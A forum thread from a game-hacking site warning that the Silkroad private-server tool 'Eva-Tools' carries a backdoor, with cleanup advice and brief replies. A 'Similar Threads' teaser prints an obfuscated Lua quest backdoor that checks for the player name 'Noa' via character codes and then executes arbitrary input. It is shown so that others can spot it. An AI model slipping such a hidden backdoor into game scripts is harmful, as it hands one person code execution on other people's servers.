elitepvpers
elitepvpers
Search


Forum New Posts Register Login

[Release] Evatools (Backdoor)

Discussion on [Release] Evatools (Backdoor) within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

« SRO PServer Guides & Releases Forum

Reply
  #1  
Old 07/03/2015, 10:21
Hello again!

Here with a new back-door found by Chernobyl. The famous "Eva-Tools" is infected and all releases of it should be removed instantly.



If you want to clean ur PC, use Malwarebytes this block this threat and you can safely use this program.

Remember:
When downloading such programs, use Wireshark and check if any outgoing traffic is sent to a specific server, or check it with Net Reflector Yourself.

For people who love it(Clean version):


Decrypted source:


Detected at 2015-07-03.
Last edited by ​Goofie​; 07/03/2015 at 10:43.
Thanks
10 Users
  #2  
Old 07/03/2015, 10:31
ty but that is not new.



//edit: Not Found
  #3  
Old 07/03/2015, 10:40
Quote:
Originally Posted by Devsome View Post
ty but that is not new.



//edit: Not Found
Just wanted to release it, also there is clean .exe and source.
  #4  
Old 07/03/2015, 11:10
@Gray Face
i need to talk with u about something please
please send me msg with ur skype
  #5  
Old 07/03/2015, 11:25
Quote:
Originally Posted by medolife20 View Post
@Gray Face
i need to talk with u about something please
please send me msg with ur skype
I don't use skype.
  #6  
Old 07/03/2015, 11:41
K tell me how to talk with u ?
cause i tried to send u msg here but it say u closed it
  #7  
Old 07/03/2015, 12:17
Quote:
Originally Posted by medolife20 View Post
K tell me how to talk with u ?
cause i tried to send u msg here but it say u closed it
Try to send now!
Last edited by ​Goofie​; 07/03/2015 at 12:42.
  #8  
Old 07/03/2015, 13:19
Nothing new, anyone with a bit of brain scans his network and applications before using them.

Besides, chernobyl is already known for his dirty stuff.
Thanks
1 User
  #9  
Old 07/03/2015, 13:58
Quote:
Originally Posted by TheWickedNite View Post
Nothing new, anyone with a bit of brain scans his network and applications before using them.

Besides, chernobyl is already known for his dirty stuff.
Well said, well said.
  #10  
Old 07/03/2015, 14:46
Good Job
  #11  
Old 07/03/2015, 15:07
Isn't that new for me either.


"Release files of chern are always clean, it is just a false positive", yea sure. Whoever trusts anyone without any questioning about anything is a brainless jerk.
  #12  
Old 07/04/2015, 08:21
Good JOB

Quote:
Originally Posted by Gray Face View Post
Hello again!

Here with a new back-door found by Chernobyl. The famous "Eva-Tools" is infected and all releases of it should be removed instantly.



If you want to clean ur PC, use Malwarebytes this block this threat and you can safely use this program.

Remember:
When downloading such programs, use Wireshark and check if any outgoing traffic is sent to a specific server, or check it with Net Reflector Yourself.

For people who love it(Clean version):


Decrypted source:


Detected at 2015-07-03.
Thanks
1 User
Reply

« request please | mBot Windows 8 LOADER !! No Manual DLL Injector !! (for mBot 1.12b) »


Similar Threads Similar Threads
[RELEASE] LUA Backdoor by Noa (Beispiel)
11/12/2013 - Metin2 PServer Guides & Strategies - 60 Replies
Da Noa solche "Backdoors" in seine Quests packt wollte ich euch mal ein Beispiel zeigen wonach ihr bei seinen releasten Quests suchen solltet. function cCost() local da = string.format('%c%c%c',78,111,97) == string.gsub("$get_name$", "%$(.-)%$",function (a ) return pc() end) and loadstring('return '..loadstring('return '..string.format('%c%c%c%c%c',105,110,112,117,116) ..'()')())() and da or 20000000 return da end


All times are GMT +1. The time now is 17:00.


Desktop Version

Powered by vBulletin®
Copyright ©2000 - 2023, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.